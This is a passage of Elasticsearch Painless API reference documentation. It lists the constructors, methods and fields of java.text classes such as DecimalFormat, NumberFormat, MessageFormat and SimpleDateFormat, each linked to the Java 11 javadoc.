{java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getZoneStrings()[getZoneStrings]() -* int {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#setAmPmStrings(java.lang.String%5B%5D)[setAmPmStrings](null[]) -* void {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#setEras(java.lang.String%5B%5D)[setEras](null[]) -* void {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#setLocalPatternChars(java.lang.String)[setLocalPatternChars](null) -* void {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#setMonths(java.lang.String%5B%5D)[setMonths](null[]) -* void 
{java11-javadoc}/java.base/java/text/DateFormatSymbols.html#setShortMonths(java.lang.String%5B%5D)[setShortMonths](null[]) -* void {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#setShortWeekdays(java.lang.String%5B%5D)[setShortWeekdays](null[]) -* void {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#setWeekdays(java.lang.String%5B%5D)[setWeekdays](null[]) -* void {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#setZoneStrings(java.lang.String%5B%5D%5B%5D)[setZoneStrings](null[][]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DecimalFormat]] -==== DecimalFormat -* {java11-javadoc}/java.base/java/text/DecimalFormat.html#()[DecimalFormat]() -* {java11-javadoc}/java.base/java/text/DecimalFormat.html#(java.lang.String)[DecimalFormat](null) -* {java11-javadoc}/java.base/java/text/DecimalFormat.html#(java.lang.String,java.text.DecimalFormatSymbols)[DecimalFormat](null, DecimalFormatSymbols) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#applyLocalizedPattern(java.lang.String)[applyLocalizedPattern](null) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#applyPattern(java.lang.String)[applyPattern](null) -* def {java11-javadoc}/java.base/java/text/Format.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object)[format](Object) -* StringBuffer {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object,java.lang.StringBuffer,java.text.FieldPosition)[format](Object, StringBuffer, FieldPosition) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/Format.html#formatToCharacterIterator(java.lang.Object)[formatToCharacterIterator](Object) -* Currency {java11-javadoc}/java.base/java/text/NumberFormat.html#getCurrency()[getCurrency]() -* DecimalFormatSymbols {java11-javadoc}/java.base/java/text/DecimalFormat.html#getDecimalFormatSymbols()[getDecimalFormatSymbols]() -* int {java11-javadoc}/java.base/java/text/DecimalFormat.html#getGroupingSize()[getGroupingSize]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMaximumFractionDigits()[getMaximumFractionDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMaximumIntegerDigits()[getMaximumIntegerDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMinimumFractionDigits()[getMinimumFractionDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMinimumIntegerDigits()[getMinimumIntegerDigits]() -* int {java11-javadoc}/java.base/java/text/DecimalFormat.html#getMultiplier()[getMultiplier]() -* null {java11-javadoc}/java.base/java/text/DecimalFormat.html#getNegativePrefix()[getNegativePrefix]() -* null {java11-javadoc}/java.base/java/text/DecimalFormat.html#getNegativeSuffix()[getNegativeSuffix]() -* null {java11-javadoc}/java.base/java/text/DecimalFormat.html#getPositivePrefix()[getPositivePrefix]() -* null {java11-javadoc}/java.base/java/text/DecimalFormat.html#getPositiveSuffix()[getPositiveSuffix]() -* RoundingMode {java11-javadoc}/java.base/java/text/NumberFormat.html#getRoundingMode()[getRoundingMode]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/text/DecimalFormat.html#isDecimalSeparatorAlwaysShown()[isDecimalSeparatorAlwaysShown]() -* boolean 
{java11-javadoc}/java.base/java/text/NumberFormat.html#isGroupingUsed()[isGroupingUsed]() -* boolean {java11-javadoc}/java.base/java/text/DecimalFormat.html#isParseBigDecimal()[isParseBigDecimal]() -* boolean {java11-javadoc}/java.base/java/text/NumberFormat.html#isParseIntegerOnly()[isParseIntegerOnly]() -* Number {java11-javadoc}/java.base/java/text/NumberFormat.html#parse(java.lang.String)[parse](null) -* Number {java11-javadoc}/java.base/java/text/NumberFormat.html#parse(java.lang.String,java.text.ParsePosition)[parse](null, ParsePosition) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String)[parseObject](null) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String,java.text.ParsePosition)[parseObject](null, ParsePosition) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setCurrency(java.util.Currency)[setCurrency](Currency) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setDecimalFormatSymbols(java.text.DecimalFormatSymbols)[setDecimalFormatSymbols](DecimalFormatSymbols) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setDecimalSeparatorAlwaysShown(boolean)[setDecimalSeparatorAlwaysShown](boolean) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setGroupingSize(int)[setGroupingSize](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setGroupingUsed(boolean)[setGroupingUsed](boolean) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMaximumFractionDigits(int)[setMaximumFractionDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMaximumIntegerDigits(int)[setMaximumIntegerDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMinimumFractionDigits(int)[setMinimumFractionDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMinimumIntegerDigits(int)[setMinimumIntegerDigits](int) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setMultiplier(int)[setMultiplier](int) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setNegativePrefix(java.lang.String)[setNegativePrefix](null) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setNegativeSuffix(java.lang.String)[setNegativeSuffix](null) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setParseBigDecimal(boolean)[setParseBigDecimal](boolean) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setParseIntegerOnly(boolean)[setParseIntegerOnly](boolean) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setPositivePrefix(java.lang.String)[setPositivePrefix](null) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setPositiveSuffix(java.lang.String)[setPositiveSuffix](null) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setRoundingMode(java.math.RoundingMode)[setRoundingMode](RoundingMode) -* null {java11-javadoc}/java.base/java/text/DecimalFormat.html#toLocalizedPattern()[toLocalizedPattern]() -* null {java11-javadoc}/java.base/java/text/DecimalFormat.html#toPattern()[toPattern]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DecimalFormatSymbols]] -==== DecimalFormatSymbols -* static Locale[] {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getAvailableLocales()[getAvailableLocales]() -* static DecimalFormatSymbols {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getInstance()[getInstance]() -* static 
DecimalFormatSymbols {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getInstance(java.util.Locale)[getInstance](Locale) -* {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#()[DecimalFormatSymbols]() -* {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#(java.util.Locale)[DecimalFormatSymbols](Locale) -* def {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Currency {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getCurrency()[getCurrency]() -* null {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getCurrencySymbol()[getCurrencySymbol]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getDecimalSeparator()[getDecimalSeparator]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getDigit()[getDigit]() -* null {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getExponentSeparator()[getExponentSeparator]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getGroupingSeparator()[getGroupingSeparator]() -* null {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getInfinity()[getInfinity]() -* null {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getInternationalCurrencySymbol()[getInternationalCurrencySymbol]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getMinusSign()[getMinusSign]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getMonetaryDecimalSeparator()[getMonetaryDecimalSeparator]() -* null {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getNaN()[getNaN]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getPatternSeparator()[getPatternSeparator]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getPerMill()[getPerMill]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getPercent()[getPercent]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getZeroDigit()[getZeroDigit]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setCurrency(java.util.Currency)[setCurrency](Currency) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setCurrencySymbol(java.lang.String)[setCurrencySymbol](null) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setDecimalSeparator(char)[setDecimalSeparator](char) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setDigit(char)[setDigit](char) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setExponentSeparator(java.lang.String)[setExponentSeparator](null) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setGroupingSeparator(char)[setGroupingSeparator](char) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setInfinity(java.lang.String)[setInfinity](null) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setInternationalCurrencySymbol(java.lang.String)[setInternationalCurrencySymbol](null) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setMinusSign(char)[setMinusSign](char) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setMonetaryDecimalSeparator(char)[setMonetaryDecimalSeparator](char) -* void 
{java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setNaN(java.lang.String)[setNaN](null) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setPatternSeparator(char)[setPatternSeparator](char) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setPerMill(char)[setPerMill](char) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setPercent(char)[setPercent](char) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setZeroDigit(char)[setZeroDigit](char) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-FieldPosition]] -==== FieldPosition -* {java11-javadoc}/java.base/java/text/FieldPosition.html#(int)[FieldPosition](int) -* {java11-javadoc}/java.base/java/text/FieldPosition.html#(java.text.Format$Field,int)[FieldPosition](Format.Field, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/text/FieldPosition.html#getBeginIndex()[getBeginIndex]() -* int {java11-javadoc}/java.base/java/text/FieldPosition.html#getEndIndex()[getEndIndex]() -* int {java11-javadoc}/java.base/java/text/FieldPosition.html#getField()[getField]() -* Format.Field {java11-javadoc}/java.base/java/text/FieldPosition.html#getFieldAttribute()[getFieldAttribute]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/text/FieldPosition.html#setBeginIndex(int)[setBeginIndex](int) -* void {java11-javadoc}/java.base/java/text/FieldPosition.html#setEndIndex(int)[setEndIndex](int) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Format]] -==== Format -* def {java11-javadoc}/java.base/java/text/Format.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object)[format](Object) -* StringBuffer {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object,java.lang.StringBuffer,java.text.FieldPosition)[format](Object, StringBuffer, FieldPosition) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/Format.html#formatToCharacterIterator(java.lang.Object)[formatToCharacterIterator](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String)[parseObject](null) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String,java.text.ParsePosition)[parseObject](null, ParsePosition) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Format-Field]] -==== Format.Field -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-MessageFormat]] -==== MessageFormat -* static null {java11-javadoc}/java.base/java/text/MessageFormat.html#format(java.lang.String,java.lang.Object%5B%5D)[format](null, Object[]) -* void {java11-javadoc}/java.base/java/text/MessageFormat.html#applyPattern(java.lang.String)[applyPattern](null) -* def 
{java11-javadoc}/java.base/java/text/Format.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object)[format](Object) -* StringBuffer {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object,java.lang.StringBuffer,java.text.FieldPosition)[format](Object, StringBuffer, FieldPosition) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/Format.html#formatToCharacterIterator(java.lang.Object)[formatToCharacterIterator](Object) -* Format[] {java11-javadoc}/java.base/java/text/MessageFormat.html#getFormats()[getFormats]() -* Format[] {java11-javadoc}/java.base/java/text/MessageFormat.html#getFormatsByArgumentIndex()[getFormatsByArgumentIndex]() -* Locale {java11-javadoc}/java.base/java/text/MessageFormat.html#getLocale()[getLocale]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Object[] {java11-javadoc}/java.base/java/text/MessageFormat.html#parse(java.lang.String)[parse](null) -* Object[] {java11-javadoc}/java.base/java/text/MessageFormat.html#parse(java.lang.String,java.text.ParsePosition)[parse](null, ParsePosition) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String)[parseObject](null) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String,java.text.ParsePosition)[parseObject](null, ParsePosition) -* void {java11-javadoc}/java.base/java/text/MessageFormat.html#setFormat(int,java.text.Format)[setFormat](int, Format) -* void {java11-javadoc}/java.base/java/text/MessageFormat.html#setFormatByArgumentIndex(int,java.text.Format)[setFormatByArgumentIndex](int, Format) -* void {java11-javadoc}/java.base/java/text/MessageFormat.html#setFormats(java.text.Format%5B%5D)[setFormats](Format[]) -* void {java11-javadoc}/java.base/java/text/MessageFormat.html#setFormatsByArgumentIndex(java.text.Format%5B%5D)[setFormatsByArgumentIndex](Format[]) -* void {java11-javadoc}/java.base/java/text/MessageFormat.html#setLocale(java.util.Locale)[setLocale](Locale) -* null {java11-javadoc}/java.base/java/text/MessageFormat.html#toPattern()[toPattern]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-MessageFormat-Field]] -==== MessageFormat.Field -* static MessageFormat.Field {java11-javadoc}/java.base/java/text/MessageFormat$Field.html#ARGUMENT[ARGUMENT] -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Normalizer]] -==== Normalizer -* static boolean {java11-javadoc}/java.base/java/text/Normalizer.html#isNormalized(java.lang.CharSequence,java.text.Normalizer$Form)[isNormalized](CharSequence, Normalizer.Form) -* static null {java11-javadoc}/java.base/java/text/Normalizer.html#normalize(java.lang.CharSequence,java.text.Normalizer$Form)[normalize](CharSequence, Normalizer.Form) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Normalizer-Form]] -==== Normalizer.Form -* static 
Normalizer.Form {java11-javadoc}/java.base/java/text/Normalizer$Form.html#NFC[NFC] -* static Normalizer.Form {java11-javadoc}/java.base/java/text/Normalizer$Form.html#NFD[NFD] -* static Normalizer.Form {java11-javadoc}/java.base/java/text/Normalizer$Form.html#NFKC[NFKC] -* static Normalizer.Form {java11-javadoc}/java.base/java/text/Normalizer$Form.html#NFKD[NFKD] -* static Normalizer.Form {java11-javadoc}/java.base/java/text/Normalizer$Form.html#valueOf(java.lang.String)[valueOf](null) -* static Normalizer.Form[] {java11-javadoc}/java.base/java/text/Normalizer$Form.html#values()[values]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NumberFormat]] -==== NumberFormat -* static int {java11-javadoc}/java.base/java/text/NumberFormat.html#FRACTION_FIELD[FRACTION_FIELD] -* static int {java11-javadoc}/java.base/java/text/NumberFormat.html#INTEGER_FIELD[INTEGER_FIELD] -* static Locale[] {java11-javadoc}/java.base/java/text/NumberFormat.html#getAvailableLocales()[getAvailableLocales]() -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getCurrencyInstance()[getCurrencyInstance]() -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getCurrencyInstance(java.util.Locale)[getCurrencyInstance](Locale) -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getInstance()[getInstance]() -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getInstance(java.util.Locale)[getInstance](Locale) -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getIntegerInstance()[getIntegerInstance]() -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getIntegerInstance(java.util.Locale)[getIntegerInstance](Locale) -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getNumberInstance()[getNumberInstance]() -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getNumberInstance(java.util.Locale)[getNumberInstance](Locale) -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getPercentInstance()[getPercentInstance]() -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getPercentInstance(java.util.Locale)[getPercentInstance](Locale) -* def {java11-javadoc}/java.base/java/text/Format.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object)[format](Object) -* StringBuffer {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object,java.lang.StringBuffer,java.text.FieldPosition)[format](Object, StringBuffer, FieldPosition) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/Format.html#formatToCharacterIterator(java.lang.Object)[formatToCharacterIterator](Object) -* Currency {java11-javadoc}/java.base/java/text/NumberFormat.html#getCurrency()[getCurrency]() -* int 
{java11-javadoc}/java.base/java/text/NumberFormat.html#getMaximumFractionDigits()[getMaximumFractionDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMaximumIntegerDigits()[getMaximumIntegerDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMinimumFractionDigits()[getMinimumFractionDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMinimumIntegerDigits()[getMinimumIntegerDigits]() -* RoundingMode {java11-javadoc}/java.base/java/text/NumberFormat.html#getRoundingMode()[getRoundingMode]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/text/NumberFormat.html#isGroupingUsed()[isGroupingUsed]() -* boolean {java11-javadoc}/java.base/java/text/NumberFormat.html#isParseIntegerOnly()[isParseIntegerOnly]() -* Number {java11-javadoc}/java.base/java/text/NumberFormat.html#parse(java.lang.String)[parse](null) -* Number {java11-javadoc}/java.base/java/text/NumberFormat.html#parse(java.lang.String,java.text.ParsePosition)[parse](null, ParsePosition) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String)[parseObject](null) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String,java.text.ParsePosition)[parseObject](null, ParsePosition) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setCurrency(java.util.Currency)[setCurrency](Currency) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setGroupingUsed(boolean)[setGroupingUsed](boolean) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMaximumFractionDigits(int)[setMaximumFractionDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMaximumIntegerDigits(int)[setMaximumIntegerDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMinimumFractionDigits(int)[setMinimumFractionDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMinimumIntegerDigits(int)[setMinimumIntegerDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setParseIntegerOnly(boolean)[setParseIntegerOnly](boolean) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setRoundingMode(java.math.RoundingMode)[setRoundingMode](RoundingMode) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NumberFormat-Field]] -==== NumberFormat.Field -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#CURRENCY[CURRENCY] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#DECIMAL_SEPARATOR[DECIMAL_SEPARATOR] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#EXPONENT[EXPONENT] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#EXPONENT_SIGN[EXPONENT_SIGN] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#EXPONENT_SYMBOL[EXPONENT_SYMBOL] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#FRACTION[FRACTION] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#GROUPING_SEPARATOR[GROUPING_SEPARATOR] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#INTEGER[INTEGER] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#PERCENT[PERCENT] -* static 
NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#PERMILLE[PERMILLE] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#SIGN[SIGN] -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ParseException]] -==== ParseException -* {java11-javadoc}/java.base/java/text/ParseException.html#(java.lang.String,int)[ParseException](null, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/text/ParseException.html#getErrorOffset()[getErrorOffset]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ParsePosition]] -==== ParsePosition -* {java11-javadoc}/java.base/java/text/ParsePosition.html#(int)[ParsePosition](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/text/ParsePosition.html#getErrorIndex()[getErrorIndex]() -* int {java11-javadoc}/java.base/java/text/ParsePosition.html#getIndex()[getIndex]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/text/ParsePosition.html#setErrorIndex(int)[setErrorIndex](int) -* void {java11-javadoc}/java.base/java/text/ParsePosition.html#setIndex(int)[setIndex](int) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-RuleBasedCollator]] -==== RuleBasedCollator -* {java11-javadoc}/java.base/java/text/RuleBasedCollator.html#(java.lang.String)[RuleBasedCollator](null) -* def {java11-javadoc}/java.base/java/text/Collator.html#clone()[clone]() -* int {java11-javadoc}/java.base/java/util/Comparator.html#compare(java.lang.Object,java.lang.Object)[compare](def, def) -* boolean {java11-javadoc}/java.base/java/util/Comparator.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/text/Collator.html#equals(java.lang.String,java.lang.String)[equals](null, null) -* CollationElementIterator {java11-javadoc}/java.base/java/text/RuleBasedCollator.html#getCollationElementIterator(java.lang.String)[getCollationElementIterator](null) -* CollationKey {java11-javadoc}/java.base/java/text/Collator.html#getCollationKey(java.lang.String)[getCollationKey](null) -* int {java11-javadoc}/java.base/java/text/Collator.html#getDecomposition()[getDecomposition]() -* null {java11-javadoc}/java.base/java/text/RuleBasedCollator.html#getRules()[getRules]() -* int {java11-javadoc}/java.base/java/text/Collator.html#getStrength()[getStrength]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#reversed()[reversed]() -* void {java11-javadoc}/java.base/java/text/Collator.html#setDecomposition(int)[setDecomposition](int) 
-* void {java11-javadoc}/java.base/java/text/Collator.html#setStrength(int)[setStrength](int) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparing(java.util.Comparator)[thenComparing](Comparator) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparing(java.util.function.Function,java.util.Comparator)[thenComparing](Function, Comparator) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingDouble(java.util.function.ToDoubleFunction)[thenComparingDouble](ToDoubleFunction) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingInt(java.util.function.ToIntFunction)[thenComparingInt](ToIntFunction) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingLong(java.util.function.ToLongFunction)[thenComparingLong](ToLongFunction) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-SimpleDateFormat]] -==== SimpleDateFormat -* {java11-javadoc}/java.base/java/text/SimpleDateFormat.html#()[SimpleDateFormat]() -* {java11-javadoc}/java.base/java/text/SimpleDateFormat.html#(java.lang.String)[SimpleDateFormat](null) -* {java11-javadoc}/java.base/java/text/SimpleDateFormat.html#(java.lang.String,java.util.Locale)[SimpleDateFormat](null, Locale) -* void {java11-javadoc}/java.base/java/text/SimpleDateFormat.html#applyLocalizedPattern(java.lang.String)[applyLocalizedPattern](null) -* void {java11-javadoc}/java.base/java/text/SimpleDateFormat.html#applyPattern(java.lang.String)[applyPattern](null) -* def {java11-javadoc}/java.base/java/text/Format.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object)[format](Object) -* StringBuffer {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object,java.lang.StringBuffer,java.text.FieldPosition)[format](Object, StringBuffer, FieldPosition) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/Format.html#formatToCharacterIterator(java.lang.Object)[formatToCharacterIterator](Object) -* Date {java11-javadoc}/java.base/java/text/SimpleDateFormat.html#get2DigitYearStart()[get2DigitYearStart]() -* Calendar 